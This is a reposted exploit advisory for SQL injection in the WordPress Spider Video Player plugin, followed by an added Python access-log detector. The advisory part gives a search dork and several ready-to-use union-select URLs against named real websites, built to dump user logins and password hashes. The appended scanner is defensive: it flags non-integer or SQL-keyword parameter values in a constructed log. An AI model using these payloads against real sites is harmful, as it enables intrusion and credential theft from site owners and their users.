Wordpress Spider Video Player plugin SQL Injection

Test method:

The program (method) may be offensive in nature and is provided solely for security research and teaching purposes; use at your own risk!
# Exploit Title : Wordpress Spider Video Player plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link : http://web-dorado.com/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 2.1
#
# Dork : inurl:wp-content/plugins/player/settings.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
#
#
#DEm0:
# http://www.voyager-channel.org/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://tremendum.org/wp-content/plugins/player/settings.php?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://www.lancssa.com/wp-content/plugins/player/settings.php?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
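As an added defensive example that is not part of the original advisory: the advisory states that `settings.php` takes `playlist` as a number and that the `theme` parameter is where the SQL lands. The Python below parses Apache combined-format access-log lines and flags any request to that script whose `playlist` or `theme` value is not a plain integer, or contains a SQL keyword such as the `union select` shown above. The log lines, client IPs and timestamps are constructed for the example; the detector is a generic allowlist check written for this page, not the plugin's own code or a vendor rule.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not real traffic): a benign
# request to the plugin, one carrying the union-select payload the advisory
# shows, one unrelated page, and one with a non-numeric theme value.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Apr/2013:10:01:02 +0000] "GET /wp-content/plugins/player/settings.php?playlist=1&theme=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [12/Apr/2013:10:01:05 +0000] "GET /wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5+from+wp_users-- HTTP/1.1" 200 4096 "-" "curl/7.29"
203.0.113.12 - - [12/Apr/2013:10:01:09 +0000] "GET /index.php?p=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.13 - - [12/Apr/2013:10:01:12 +0000] "GET /wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=abc HTTP/1.1" 200 600 "-" "Mozilla/5.0"
"""

# Apache combined log: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Path of the vulnerable script (from the advisory) and the two parameters
# it documents: "playlist=[num]" and "theme", where the injection lands.
VULN_PATH = "/wp-content/plugins/player/settings.php"
NUMERIC_PARAMS = ("playlist", "theme")
INTEGER_RE = re.compile(r"-?\d+")
SQL_KEYWORD_RE = re.compile(r"\b(union|select|from|group_concat)\b", re.IGNORECASE)


def classify_request(target):
    """Return a list of findings for one request target; empty means benign."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_PATH):
        return []
    # parse_qs percent-decodes and turns '+' into spaces, so each value is
    # inspected in the form the PHP script would actually receive it.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name in NUMERIC_PARAMS:
        for value in params.get(name, []):
            # Allowlist first: the parameter is documented as numeric, so
            # anything else is anomalous regardless of how it is encoded.
            if not INTEGER_RE.fullmatch(value):
                findings.append(f"{name}: non-numeric value {value!r}")
            # Secondary signal: SQL keywords inside the value.
            if SQL_KEYWORD_RE.search(value):
                findings.append(f"{name}: SQL keyword in value")
    return findings


def scan_log(text):
    """Parse log lines; return (ip, status, target, findings) for flagged requests."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        findings = classify_request(match["target"])
        if findings:
            hits.append((match["ip"], int(match["status"]), match["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, status, target, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
        for finding in findings:
            print(f"    {finding}")
```

The integer allowlist does the real work: because the advisory documents both parameters as numeric, any value that is not a plain integer is worth an alert, whatever payload or encoding it carries. The keyword match is only a secondary label that makes the union-select case stand out in triage; the same path-and-parameter check translates directly into a WAF or IDS rule for the plugin.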
Original source: https://www.cnblogs.com/security4399/p/3015576.html